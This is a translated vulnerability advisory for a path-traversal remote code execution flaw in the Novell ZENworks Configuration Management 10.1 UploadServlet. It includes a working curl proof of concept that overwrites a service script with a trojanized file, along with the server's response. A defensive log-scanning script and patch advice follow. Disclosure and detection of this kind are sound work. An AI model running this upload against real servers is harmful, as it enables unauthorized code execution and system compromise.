Novell ZENworks Configuration Management UploadServlet Remote Code Execution Vulnerability

Published: 2010-03-30
Updated: 2010-04-26

Affected systems:
Novell ZENworks Configuration Management 10.1
Unaffected systems:
Novell ZENworks Configuration Management 10.3
Description:
BUGTRAQ  ID: 39114

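Novell ZENworks Configuration Management is the configuration management solution among the ZENworks system gateway tools.

A remote code execution vulnerability exists in the ZENworks Server (zenserver.exe) service process started by ZENworks Configuration Management. The service listens on TCP ports 80 and 443 by default. By submitting a malicious request to these ports that invokes UploadServlet, an attacker can upload malicious files to locations outside the server's TEMP directory; accessing the uploaded program afterwards causes it to execute with the privileges of the zenserver.exe process.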

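<*Source: Stephen Fewer
  
  Links: http://marc.info/?l=bugtraq&m=127205201010040&w=2
         http://www.novell.com/support/viewContent.do?externalId=7005573
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!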

$ ls -l /opt/novell/zenworks/bin/daemon-monitor
-rw-rw-r-- 1 zenworks zenworks 554 XXXX-YY-ZZ 69:69 /opt/novell/zenworks/bin/daemon-monitor
$ cat /opt/novell/zenworks/bin/daemon-monitor
SERVICES=`awk -F= '{ if ($1 == "services") print $2}' /etc/opt/novell/zenworks/monitor.conf`
SLEEPTIME=`awk -F= '{ if ($1 == "sleep") print $2}' /etc/opt/novell/zenworks/monitor.conf`

echo $SERVICES
echo $SLEEPTIME

if [ -z "$SERVICES" ]; then
    echo "No services defined in /etc/opt/novell/zenworks/monitor.conf"
    exit 1
fi

if [ -z "$SLEEPTIME" ]; then
    SLEEPTIME=10
fi

while [ 1 ]; do
    sleep $SLEEPTIME
    for SRV in $SERVICES; do
         /etc/init.d/$SRV status >/dev/null 2>&1 || /etc/init.d/$SRV start
        ( date ; id ) >> /tmp/monitor.log 2>&1
    done
done
$


$ curl -ivkl 'http://zcm.server/zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true' --data-binary @./daemon-monitor.troyanizado -H "Content-Type: application/octet-stream"
* About to connect() to zcm.server port 80 (#0)
*   Trying 127.11.22.33... connected
* Connected to zcm.server (127.11.22.33) port 80 (#0)
> POST /zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true HTTP/1.1
> User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.12.6.2 zlib/1.2.3 libidn/1.9 libssh2/1.2.2
> Host: zcm.server
> Accept: */*
> Content-Type: application/octet-stream
> Content-Length: 554
>
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
Server: Apache-Coyote/1.1
< Content-Length: 0
Content-Length: 0
< Date: Mon, 26 Apr 2010 21:58:05 GMT
Date: Mon, 26 Apr 2010 21:58:05 GMT

<
* Connection #0 to host zcm.server left intact
* Closing connection #0
$
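
The request above carries "../" sequences in the type parameter of /zenworks-fileupload/, which is what lets the upload land outside the TEMP directory. As an added example (not part of the original advisory and not Novell's code), the following check scans web access logs for upload requests whose type or filename parameter contains a ".." path segment. The log layout, the sample lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: the access log contains the quoted request line, as in the
# Apache/Tomcat "common" format. Only that field is parsed.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
UPLOAD_PATH = "/zenworks-fileupload"   # servlet path from the advisory's request
CHECKED_PARAMS = ("type", "filename")  # parameters that form the destination path


def has_traversal(value: str) -> bool:
    """True if value holds a '..' path segment after percent-decoding."""
    for _ in range(3):  # bounded re-decoding normalises nested encoding
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return ".." in re.split(r"[\\/]", value)


def suspicious_uploads(log_lines):
    """Return (line_number, parameter, value) for upload requests with traversal."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        if not url.path.rstrip("/").lower().startswith(UPLOAD_PATH):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        for name in CHECKED_PARAMS:
            for value in params.get(name, []):
                if has_traversal(value):
                    hits.append((number, name, value))
    return hits


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Apr/2010:21:58:05 +0000] "POST /zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true HTTP/1.1" 200 0',
    '192.0.2.11 - - [26/Apr/2010:22:01:10 +0000] "POST /zenworks-fileupload/?type=application/octet-stream&filename=inventory.xml HTTP/1.1" 200 0',
    '192.0.2.12 - - [26/Apr/2010:22:03:44 +0000] "POST /zenworks-fileupload/?type=x%2F..%2F..%2Fopt&filename=a HTTP/1.1" 200 0',
    '192.0.2.13 - - [26/Apr/2010:22:05:00 +0000] "GET /zenworks/?page=../x HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in suspicious_uploads(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 on a 10.1 server is a reason to inspect the file named by the decoded path for unexpected changes.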

Recommendation:
Vendor patch:

Novell
------
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's home page:

http://www.novell.com/support

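This vulnerability entry was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.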